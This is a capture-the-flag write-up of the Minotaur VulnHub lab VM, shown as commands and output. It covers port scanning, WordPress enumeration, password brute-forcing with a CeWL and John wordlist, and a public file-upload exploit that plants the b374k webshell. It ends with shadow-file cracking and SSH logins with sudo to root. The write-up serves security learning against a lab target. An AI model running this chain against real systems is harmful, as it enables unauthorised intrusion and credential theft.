BNE0x00 - Minotaur Writeup

Up for today, is the Minotaur ctf.

As usually, we start with and nmap on the host.

[email protected]:~/ctfs/minotaur# nmap -A -T4 -sV -p- -v 192.168.56.223

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-10 12:06 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:06
Completed NSE at 12:06, 0.00s elapsed
Initiating NSE at 12:06
Completed NSE at 12:06, 0.00s elapsed
Initiating ARP Ping Scan at 12:06
Scanning 192.168.56.223 [1 port]
Completed ARP Ping Scan at 12:06, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:06
Completed Parallel DNS resolution of 1 host. at 12:06, 0.03s elapsed
Initiating SYN Stealth Scan at 12:06
Scanning 192.168.56.223 [65535 ports]
Discovered open port 80/tcp on 192.168.56.223
Discovered open port 22/tcp on 192.168.56.223
Discovered open port 2020/tcp on 192.168.56.223
Completed SYN Stealth Scan at 12:06, 5.40s elapsed (65535 total ports)
Initiating Service scan at 12:06
Scanning 3 services on 192.168.56.223
Completed Service scan at 12:06, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.223
NSE: Script scanning 192.168.56.223.
Initiating NSE at 12:06
Completed NSE at 12:06, 0.97s elapsed
Initiating NSE at 12:06
Completed NSE at 12:06, 0.01s elapsed
Nmap scan report for 192.168.56.223
Host is up (0.00034s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 08:00:27:75:F8:9D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 198.049 days (since Sun Oct 25 09:56:31 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.56.223

NSE: Script Post-scanning.
Initiating NSE at 12:06
Completed NSE at 12:06, 0.00s elapsed
Initiating NSE at 12:06
Completed NSE at 12:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

So open ports are 22, 80 and 2020 for an ftp that supports anonymous logins. I have no luck with the ftp since the directories are empty, and port 80 displays the default apache webpage so I move on with dirbuster to see what I might be missing on that webserver.



So apart from some usual directories, we have /bull. It appears to be a wordpress site so let's take a look at it using a browser.


Indeed, it is a site about bulls. Funny topic for someone to choose. Let's see if WPScan can identifiy any vulnerabilities about the wordpress installation at hand.

[email protected]:~/ctfs/minotaur# wpscan http://192.168.56.223/bull
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Tue May 10 12:13:34 2016

[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/
.
.
.
output omitted
.
.
.
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7532
    Reference: http://seclists.org/bugtraq/2014/Sep/1
    Reference: http://packetstormsecurity.com/files/131526/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
    Reference: https://www.exploit-db.com/exploits/34681/
    Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
    Reference: https://wpvulndb.com/vulnerabilities/8263
    Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
    Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[+] Finished: Tue May 10 12:13:40 2016
[+] Requests Done: 45
[+] Memory used: 53.441 MB
[+] Elapsed time: 00:00:05

I omitted some of the output because it was a long list, but the important thing is that there is an arbitrary file upload vulnerability in Slideshow Gallery.

And we have the exploit ready for it. However for it to work, we need to be authenticated so we take a look at the site again for any users or posts.


There is a post, by user "bully" and since the hints of this ctf mention cracking/bruteforcing, we probably have to find his password.

Using Cewl, I scrape a wordlist off of the website. and use WPScan's bruteforcing function to see if I got anything.

[email protected]:~/ctfs/minotaur# cewl http://192.168.56.223/bull -m 3 -w wordlist.txt
CeWL 5.1 Robin Wood ([email protected]) (http://digi.ninja)

[email protected]:~/ctfs/minotaur# wpscan -u http://192.168.56.223/bull --username bully --wordlist /root/ctfs/minotaur/wordlist.txt --threads 10
[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:00:16 <============================================================================ > (477 / 479) 99.58%  ETA: 00:00:00

  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | bully |      |          |
  +----+-------+------+----------+

[+] Finished: Tue May 10 12:48:53 2016
[+] Requests Done: 529
[+] Memory used: 77.09 MB
[+] Elapsed time: 00:00:18

So, no luck. Let's try to mess around with the wordlist and mix the words with John to see if anything comes up.

[email protected]:~/ctfs/minotaur# john --wordlist=wordlist.txt --rules --stdout > bigwordlist.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
21164p 0:00:00:00 100.00% (2016-05-10 12:54) 235155p/s Feeding
[email protected]:~/ctfs/minotaur# wpscan -u http://192.168.56.223/bull --username bully --wordlist /root/ctfs/minotaur/bigwordlist.txt --threads 10
[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:31:05 <==================================================================       > (19301 / 21165) 91.19%  ETA: 00:03:00
  [+] [SUCCESS] Login : bully Password : Bighornedbulls


  +----+-------+------+----------------+
  | Id | Login | Name | Password       |
  +----+-------+------+----------------+
  |    | bully |      | Bighornedbulls |
  +----+-------+------+----------------+

[+] Finished: Tue May 10 13:25:58 2016
[+] Requests Done: 19352
[+] Memory used: 112.891 MB
[+] Elapsed time: 00:31:07

Great! We got the login credentials for user "bully". Off to exploit the vulnerability. I grab the source code from this link and on with it.

[email protected]:~/ctfs/minotaur# wget https://www.exploit-db.com/download/34681
--2016-05-10 13:38:07--  https://www.exploit-db.com/download/34681
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘34681’

34681                                     [ <=>                                                                      ]   9.71K  --.-KB/s    in 0.04s   

2016-05-10 13:38:10 (251 KB/s) - ‘34681’ saved [9939]

[email protected]:~/ctfs/minotaur# mv 34681 exploit.py
[email protected]:~/ctfs/minotaur# python exploit.py -t http://192.168.56.223/bull -u bully -p Bighornedbulls -f ../../b374k/shell.php
[+] Username & password ACCEPTED!

[!] Shell Uploaded!
[+] Check url: http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/../../b374k/shell.php (lowercase!!!!)

Great so our webshell is uploaded to the target machine. Keep in mind that ../../b374k/ is just included in the output because it was in the file directory when we ran the command. In the actual url we exclude that. Let's see what we got.


Great, the webshell is up and running and we are free to roam the machine for more clues.
But first... there is a flag in /var/www/html!

/var/www/html/>ls -l
total 20
drwxr-xr-x 5 www-data www-data  4096 May 14  2015 bull
-rw------- 1 www-data www-data    47 May 27  2015 flag.txt
-rw-r--r-- 1 www-data www-data 11510 May 14  2015 index.html

/var/www/html/>cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N [email protected] [email protected]!

Let's go on and look for more flags...
While roaming through directories, /tmp contents were very interesting. Plus another flag!

/tmp/>ls -l
total 8
-rw-r----- 1 root www-data  121 May 27  2015 flag.txt
-rw-r----- 1 root www-data 1148 May 27  2015 shadow.bak

/tmp/>cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 2="" b0y="" br1="" pre="" t3h="" y="">


As a matter of fact, yes, the contents of shadow.bak are very intersting. We have the passwords of the system's users. Hopefully if we manage to crack them, we might be able to get a sudoer out of them.
In order to crack the passwords, we grab a copy of shadow.bak along with a copy of /etc/passwd and we employ our friend john.

First we need to unshadow the files using John's "unshadow" utility to obtain the traditional Unix password file

[email protected]:~/ctfs/minotaur/tocrack# ls -l
total 8
-rw-r--r-- 1 root root 1360 May 10 14:14 passwd
-rw-r--r-- 1 root root 1148 May 10 14:09 shadow
[email protected]:~/ctfs/minotaur/tocrack# unshadow passwd shadow > passwords

And then our old buddy john comes back for another round

[email protected]:~/ctfs/minotaur# john passwords 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)

So we got the passwords for users "heffer" and "minotaur". Let's fire up ssh and see if any of them is a sudoer.

First of with user "heffer"

[email protected]:~/ctfs/minotaur# ssh [email protected]
The authenticity of host '192.168.56.223 (192.168.56.223)' can't be established.
ECDSA key fingerprint is SHA256:xXsVJy45Ua0gBY/VnSlCY3BdII4sptI+m0U8dGMSYOA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.223' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed May 11 01:02:58 AEST 2016

  System load:  1.55              Processes:           77
  Usage of /:   7.5% of 18.81GB   Users logged in:     0
  Memory usage: 6%                IP address for eth0: 192.168.56.223
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May 27 16:57:26 2015
[email protected]:~$ ls -l
total 4
-rw------- 1 heffer heffer 107 May 27  2015 flag.txt
[email protected]:~$ cat flag.txt 
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 [email protected] 15: m00000 y0
[email protected]:~$ sudo su
[sudo] password for heffer: 
Sorry, user heffer is not allowed to execute '/bin/su' as root on minotaur.

No sudoer here, at least we got another flag though!

Moving on with "minotaur" user

[email protected]:~/ctfs/minotaur# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed May 11 01:05:35 AEST 2016

  System load:  0.22              Processes:           83
  Usage of /:   7.5% of 18.81GB   Users logged in:     0
  Memory usage: 14%               IP address for eth0: 192.168.56.223
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May 27 16:55:30 2015
[email protected]:~$ ls -l
total 8
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
drwxr-xr-x 4 minotaur minotaur 4096 May 27  2015 peda
[email protected]:~$ cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
[email protected]:~/peda$ sudo su
[sudo] password for minotaur: 
[email protected]:/home/minotaur# cd
[email protected]:~# ls -l
total 12
-rw------- 1 root root   70 May 27  2015 flag.txt
drwxr-xr-x 4 root root 4096 May 27  2015 peda
-rwx------ 1 root root  845 May 15  2015 quotes.txt
[email protected]:~# cat flag.txt 
Congrats! You got the final flag!
Th3 [email protected] is: 5urr0nd3d bY @r$3h0l35

That's it! Minotaur had a flag in his home folder, plus, he is a sudoer. We managed to cd to /root and get the last flag.

However, I thought I was going to have to use peda which I found in the final user's directory for the final escalation. Nevertheles a very entertaining vm!

Once again thanks to RobertWinkel for creating the vm and Vulnhub for hosting it. Cheers!

Comments